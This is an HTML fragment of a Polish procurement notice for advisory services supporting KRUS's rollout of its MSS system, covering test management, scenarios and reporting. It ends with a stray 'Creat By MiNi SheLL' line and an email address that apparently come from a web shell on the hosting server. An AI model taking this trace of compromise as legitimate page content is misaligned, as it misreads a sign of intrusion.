- merytoryczna ocena wniosków o zmiany i kastomizacje - w szczególności projektów technicznych i wycen kosztów zmian ww. komponentów,
- merytoryczna ocena realizacji wymagań w zaimplementowanym Systemie MSS.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.24.60.00-1, 72.22.41.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Usługi doradcze w zakresie wdrożenia Systemu Zarządzania w KRUS, w podziale na II  części.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II obejmuje - wsparcie w zakresie zarządzania procesem testów Systemu MSS.
Szczegółowy zakres usług dotyczy:
1)	utrzymania i bieżącej aktualizacji harmonogramu testów,
2)	zarządzania zespołem testowym (obsada zespołu testowego należy do zadań Zamawiającego),
3)	kontroli spójności i aktualizacji sekwencji scenariuszy testowych,
4)	wsparcia Kierownika Projektu System MSS po stronie Zamawiającego w celu zapewnienia logistyki testów,
5)	weryfikacji i aktualizacji dokumentacji testowej,
6)	kierowania procesem testów, w tym:
a)	udział we wprowadzeniu do dnia testowego,
b)	kontrola przebiegu testów,
c)	udział w spotkaniach podsumowujących dzień testowy, w tym:
- weryfikacja statusu wykonania scenariuszy testowych,
-	aktualizacja harmonogramu  testów,
-	weryfikacja prawidłowości kategoryzacji błędów,
-	kontrola działań w przypadku rozbieżnych zdań,
-	weryfikacja podpisywanych protokołów do wykonywanych scenariuszy,
d)	bieżąca kontrola i aktualizacja harmonogramu, obsady i sekwencji testów,
e)	raportowanie postępu testów.
7)	przygotowania raportu końcowego z testów.

Podmiotem wdrażającym System MSS w KRUS - jest firma Comarch S.A.
System MSS jest wdrażany w KRUS z wykorzystaniem metodyki opartej o standardową metodykę zarządzania projektami PRINCE 2..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.26.60.00-1, 72.22.41.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.01.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com